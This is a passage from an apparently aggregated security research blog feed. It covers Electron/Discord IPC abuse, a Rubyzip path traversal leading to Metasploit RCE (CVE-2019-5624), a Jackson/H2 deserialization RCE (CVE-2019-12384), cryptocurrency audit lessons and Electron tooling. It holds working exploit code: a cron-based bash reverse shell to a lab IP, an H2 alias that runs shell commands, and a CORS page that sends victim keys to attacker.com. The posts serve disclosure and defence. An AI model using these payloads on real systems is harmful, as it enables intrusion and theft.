  event.returnValue = null
})

As there’s no separation between application-level IPC messages and the ELECTRON_ internal channel, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework’s security mechanism.

For example, the following synchronous IPC calls can be used to execute an arbitrary binary:

(function () {
    var ipcRenderer = require('electron').ipcRenderer
    var electron = ipcRenderer.sendSync("ELECTRON_BROWSER_REQUIRE","electron");
    var shell = ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_GET", electron.id, "shell");
    return ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_CALL", shell.id, "openExternal", [{
                            type: 'value',
                            value: "file:///Applications/Calculator.app"
    }]);
})();

In the case of the Discord’s preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference of the objects from the function exposed in the untrusted window, an attacker can still brute-force the reference of the child_process using the following code:

DiscordNative.ipc.send("ELECTRON_BROWSER_REQUIRE","child_process");

for(var i=0;i<50;i++){
    DiscordNative.ipc.send("ELECTRON_BROWSER_MEMBER_CALL", i, "exec", [{
            type: 'value',
            value: "calc.exe"
    }]);
}


This issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards compatibility code with old clients.

Nagios XI 5.5.10: XSS to #

10 April 2019 at 13:10
Tl;dr A remote attacker could trick an authenticated victim (with “autodiscovery job” creation privileges) to visit a malicious URL and obtain a remote root shell via a reflected Cross-Site Scripting (XSS), an authenticated Remote Code Execution (RCE) and a Local Privilege Escalation (LPE). Introduction A few months ago I read about some Nagios XI vulnerabilities which got me interested in studying it a bit by myself. For those of you who don’t know what Nagios XI is I suggest you have a look at their website.

Exploiting Apache Solr through OpenCMS

13 April 2019 at 09:19
Tl;dr It’s possible to exploit a known Apache Solr vulnerability through OpenCMS. Introduction meme During one of my last Penetration Test I was asked to analyze some OpenCMS instances. Before the assessment I wasn’t really familiar with OpenCMS, so I spent some time on the official documentation in order to understand how it works, which is the default configuration and if there are some security-related configurations which I should check during the test.

On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

23 April 2019 at 22:00

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While the Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

Resulting in a file being created in /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive)
  4. Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
  5. Login in the MSF Web Interface
  6. Create a new “Project”
  7. Select “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell


Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage Input by user? Vulnerable to path traversal?
entry.extract(path) yes (path) yes
entry.extract(path) partially (path is concatenated) maybe
entry.extract() partially (entry name) no
entry.extract() no no

If you’re using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources:

Electronegativity 1.3.0 released!

10 June 2019 at 22:00

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0 with many new improvements and security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. Now it counts over 40 checks, featuring a new advanced check system to help improve the tool’s detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

  • Now every check has an importance and accuracy attribute which helps the auditor to determine the importance of each finding. Consequently, we also introduced some new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
  • We introduced a new class of checks called GlobalChecks which can dynamically set the severity and confidence for the findings or create new ones considering the inherit security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flags value or the presence of the affinity flag used acrossed different windows).
  • Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
  • The newly introduced Electron’s component BrowserView is now supported, which is meant to be an alternative to the WebView tag. The tool now also detects the use of the nodeIntegrationInSubFrames experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Due to reusing the renderer process, certain webPreferences options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity set between the two BrowserWindow objects will cause the unwanted share of the nodeIntegration property value. Electronegativity will now issue a finding reporting the usage of this flag if present.

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application. From this release we switched from manually updating a safe releases file to creating a routine which automatically fetches the latest releases from Electron’s official repository and determines if there are security patches available at each run.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki page.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site-scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

Detects if the on() handler for will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control to remote origins in case of accidental navigation.

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling this warning may hide the presence of misconfigurations or insecure patterns to the developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a setPermissionRequestHandler has been set.

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron’s security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind and that creating the right and robust tools to help this community is the first step towards improving the whole Electron’s ecosystem security stance.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella

Electron Security Workshop

2 July 2019 at 22:00

2-Days Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-days workshop.

ElectronJS Logo

With the increasing popularity of the ElectronJs Framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise in depth defense mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface. We will analyze what are the common root causes for misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you’re interested, check out this short teaser:

Audience Profile

Who should take this course?

  • JavaScript and Node.js Developers
  • Security Engineers
  • Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and basic understanding of web application security (e.g. XSS) is required.

General Information

Attendees will receive a bundle with all material, including:

  • Workshop presentation (over 200 slides)
  • Code, exploits and artifacts of all exercises
  • Certificate of completion

This 2-days training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at [email protected] for scheduling your class!

Jackson gadgets - Anatomy of a vulnerability

21 July 2019 at 22:00

Jackson CVE-2019-12384: anatomy of a vulnerability class

During one of our engagements, we analyzed an application which used the Jackson library for deserializing JSONs. In that context, we have identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we want to show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution.

This research also resulted in a new CVE-2019-12384 and a bunch of RedHat products affected by it:

Vulnerability Impact

What is required?

As reported by Jackson’s author in On Jackson CVEs: Don’t Panic — Here is what you need to know the requirements for a Jackson “gadget” vulnerability are:

  1. (1) The application accepts JSON content sent by an untrusted client (composed either manually or by a code you did not write and have no visibility or control over) — meaning that you can not constrain JSON itself that is being sent

  2. (2) The application uses polymorphic type handling for properties with nominal type of java.lang.Object (or one of small number of “permissive” tag interfaces such as java.util.Serializable, java.util.Comparable)

  3. (3) The application has at least one specific “gadget” class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific libraries — e.g. most commonly reported ones work with JDK serialization

  4. (4) The application uses a version of Jackson that does not (yet) block the specific “gadget” class. There is a set of published gadgets which grows over time so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist. The deserialization is a “feature” of the platform and they continually update a blacklist of known gadgets that people report.

In this research we assumed that the preconditions (1) and (2) are satisfied. Instead, we concentrated on finding a gadget that could meet both (3) and (4). Please note that Jackson is one of the most used deserialization frameworks for Java applications where polymorphism is a first-class concept. Finding these conditions comes at zero-cost to a potential attacker who may use static analysis tools or other dynamic techniques, such as grepping for @class in request/responses, to find these targets.

Preparing for the battlefield

During our research we developed a tool to assist the discovery of such vulnerabilities. When Jackson deserializes ch.qos.logback.core.db.DriverManagerConnectionSource, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity. JDBC is a Java API to connect and execute a query with the database and it is a part of JavaSE (Java Standard Edition). Moreover, JDBC uses an automatic string to class mapping, as such it is a perfect target to load and execute even more “gadgets” inside the chain.

In order to demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used jRuby, a ruby implementation running on top of the Java Virtual Machine (JVM). With its integration on top of the JVM, we can easily load and instantiate Java classes.

We’ll use this setup to load Java classes easily in a given directory and prepare the Jackson environment to meet the first two requirements (1,2) listed above. In order to do that, we implemented the following jRuby script.

require 'java'
Dir["./classpath/*.jar"].each do |f|
	require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

The script proceeds as follows:

  1. At line 2, it loads all of the classes contained in the Java Archives (JAR) within the “classpath” subdirectory
  2. Between lines 5 and 13, it configures Jackson in order to meet requirements (#2)
  3. Between lines 14 and 17, it deserializes and serializes a polymorphic Jackson object passed to jRuby as JSON

Memento: reaching the gadget

For this research we decided to use gadgets that are widely used by the Java community. All the libraries targeted in order to demonstrate this attack are in the top 100 most common libraries in the Maven central repository.

To follow along and to prepare for the attack, you can download the following libraries and put them in the “classpath” directory:

It should be noted the h2 library is not required to perform SSRF, since our experience suggests that most of the time Java applications load at least one JDBC Driver. JDBC Drivers are classes that, when a JDBC url is passed in, are automatically instantiated and the full URL is passed to them as an argument.

Using the following command, we will call the previous script with the aforementioned classpath.

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]"

On line 15 of the script, Jackson will recursively call all of the setters with the key contained inside the subobject. To be more specific, the setUrl(String url) is called with arguments by the Jackson reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At this point all the fields are serialized directly, if no getter is defined, or through an explicit getter. The interesting getter for us is getConnection(). In fact, as an attacker, we are interested in all “non pure” methods that have interesting side effects where we control an argument.

When the getConnection is called, an in memory database is instantiated. Since the application is short lived, we won’t see any meaningful effect from the attacker’s perspective. In order to do something more meaningful we create a connection to a remote database. If the target application is deployed as a remote service, an attacker can generate a Server Side Request Forgery (SSRF). The following screenshot is an example of this scenario.

Jackson Chain

Enter the Matrix: From SSRF to RCE

As you may have noticed both of these scenarios lead to DoS and SSRF. While those attacks may affect the application security, we want to show you a simple and effective technique to turn a SSRF into a full chain RCE.

In order to gain full code execution in the context of the application, we employed the capability of loading the H2 JDBC Driver. H2 is a super fast SQL database usually employed as in memory replacement for full-fledged SQL Database Management Systems (such as Postgresql, MSSql, MySql or OracleDB). It is easily configurable and it actually supports many modes such as in memory, on file, and on remote servers. H2 has the capability to run SQL scripts from the JDBC URL, which was added in order to have an in-memory database that supports init migrations. This alone won’t allow an attacker to actually execute Java code inside the JVM context. However H2, since it was implemented inside the JVM, has the capability to specify custom aliases containing java code. This is what we can abuse to execute arbitrary code.

We can easily serve the following inject.sql INIT file through a simple http server such as a python one (e.g. python -m SimpleHttpServer).

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

And run the tester application with:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)

Voila’!

Iterative Taint-Tracking

Exploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other end, the Jackson blacklists are updated on a monthly basis while users of this mechanism (e.g. enterprise applications) may have yearly release cycles.

Deserialization vulnerabilities are the typical needle-in-the-haystack problem. On the one hand, identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets to facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through taint-tracking analysis. We designed it to be fast enough to run multiple times and iterate/improve through a custom and extensible rule-set language. On average a run on a Macbook PRO i7 2018 takes 2 minutes.

Jackson Taint Tracking

Taint-tracking is a topical academic research subject. Academic research tools are focused on a very high recall and precision. The trade-off lies between high-recall/precision versus speed/memory. Since we wanted this tool to be usable while testing commercial grade products and we valued the customizability of the tool by itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as flowdroid, the focus of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable security automation.

This research was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

That’s all folks! Keep it up and be safe!

Lessons in auditing cryptocurrency wallets, systems, and infrastructures

31 July 2019 at 22:00

In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchanges web interfaces, custody systems, and backbone infrastructure components.

We have seen many things done right, but also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to create better systems.

Vulnerability Impact

In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.

Breaking Crypto Currency Systems != Breaking Crypto (at least not always)

For that, you would probably need to wait for Jean-Philippe Aumasson’s talk at the upcoming BlackHat Vegas.

This blog post was brought to you by Kevin Joensen and Mateusz Swidniak.

1) CORS Misconfigurations

Cross-Origin Resource Sharing is used for relaxing the Same Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS can have a great impact on the website security posture as other sites might access the page content.

Imagine a website with the following HTTP response headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag and a sandbox attribute.

<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug" />
<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();

function callback() {
    location='https://attacker.com/?dump='+this.responseText;
};
</script>
</body>

When the victim visits the crafted page, the attacker can perform a request to https://bitcoinbank/keys and retrieve their secret keys.

This can also happen when the Access-Control-Allow-Origin response header is dynamically updated to the same domain as specified by the Origin request header.

References:

Checklist:

  • Ensure that your Access-Control-Allow-Origin is never set to null
  • Ensure that Access-Control-Allow-Origin is not taken from a user-controlled variable or header
  • Ensure that you are not dynamically copying the value of the Origin HTTP header into Access-Control-Allow-Origin

2) Asserts and Compilers

In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors, however there is a specific class of idiosyncrasies that can have devastating effects.

Let’s consider this Python code as an example:

# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])

At first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that Python runs with __debug__ by default. This allows for assert statements like the security control illustrated above. When the code gets compiled to optimized byte code (*.pyo files) and lands into production, all asserts are gone. As a result, the application will not enforce any security checks.

Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Closure and many more.

For example, let’s consider the following Swift code:

// No assert if password is == mysecret
if (password != "mysecretpw") {
   assertionFailure("Password not correct!")
}

If you were to run this code in Xcode, then it would simply hit your assertionFailure in case of an incorrect password. This is because Xcode compiles the application without any optimizations using the -Onone flag. If you were to build the same code for the Apple Store instead, the check would be optimized out leading to no password check at all since the execution will continue. Note that there are many things wrong in those three lines of code.

Talking about assertions, PHP takes the first place and de-facto facilitates RCE when you run asserts with a string argument. This is due to the argument getting evaluated through the standard eval.

References:

Checklist:

  • Do not use assert statements for guarding code and enforcing security checks
  • Research for compiler optimizations gotchas in the language you use

3) Arithmetic Errors

A bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.

For example, let’s consider a withdrawal function that looks for the amount of money in a certain wallet. Being able to pass a negative number could be abused to generate money for that account.

Imagine the following example code:

if data["wallet"].balance < data["amount"]:
    error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
...    
data["wallet"].balance = data["wallet"].balance - data["amount"]

The if statement correctly checks if the balance is higher than the requested amount. However, the code does not enforce the use of a positive number.

Let’s try with -100 coins in a wallet account having 200 coins.

The check would be satisfied and the code responsible for updating the amount would look like the following:

data["wallet"].balance = 200 - (-100) # 300 coins

This would enable an attacker to get free money out of the system.

Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which signed vs unsigned types come to play.

In most architectures, a signed short integer is a 2 bytes type that can hold a negative number and a positive number. In memory, positive numbers are represented as 1 == 0x0001, 2 == 0x0002 and so forth. Instead, negative numbers are represented as two’s complement -1 == 0xffff,-2 == 0xfffe and so forth. These representations meet on 0x7fff, which enables a signed integer to hold a value between -32768 and 32767.

Let’s take a look at an example with pseudo-code:

signed short int bank_account = -30000

Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:

int withdraw(signed short int money){
    bank_account -= money
}

As we know, the max negative value is -32768. What happens if a user withdraws 2768 + 1 ?

withdraw(2769); //32767

Yes! No longer in debt thanks to integer wrapping. Current balance is now 32767.

References:

Checklist:

  • Verify that the transaction systems and other components dealing with financial arithmetic do not accept negative numbers
  • Verify integer boundaries, and whether correct signed vs unsigned types are used across the entire codebase. Note that the signed integer overflow is considered undefined behavior.

4) Password Reset Token Leakage Via Referer

Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms.

Vulnerability Impact

A standard procedure for a password reset in modern web applications involves the use of a secret link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration.

Those links typically take the form of https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320 or https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320.

But what actually happens when the user clicks the link?

When a web browser requests a resource, it typically adds an HTTP header, called the Referer header indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the Referer header is still generally included in the cross-domain request. It is not uncommon that the password reset page loads external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will be also sent to the 3rd-party domains.

GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close

As a result, personnel working for the affected 3rd-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform.

References:

Checklist:

  • If possible, applications should never transmit any sensitive information within the URL query string
  • In case of password reset links, the Referer header should always be removed using one of the following techniques:
    • Blank landing page under the web platform domain, followed by a redirect
    • Originate the navigation from a pseudo-URL document, such as data: or javascript:
    • Using <iframe src=about:blank>
    • Using <meta name="referrer" content="no-referrer" />
    • Setting an appropriate Referrer-Policy header, assuming your application supports recent browsers only

If you would like to talk about securing your platform, contact us at [email protected]!

Sushi Roll: A CPU research kernel with minimal noise for cycle-by-cycle micro-architectural introspection

19 August 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Summary

In this blog we’re going to go into details about a CPU research kernel I’ve developed: Sushi Roll. This kernel uses multiple creative techniques to measure undefined behavior on Intel micro-architectures. Sushi Roll is designed to have minimal noise such that tiny micro-architectural events can be measured, such as speculative execution and cache-coherency behavior. With creative use of performance counters we’re able to accurately plot micro-architectural activity on a graph with an x-axis in cycles.

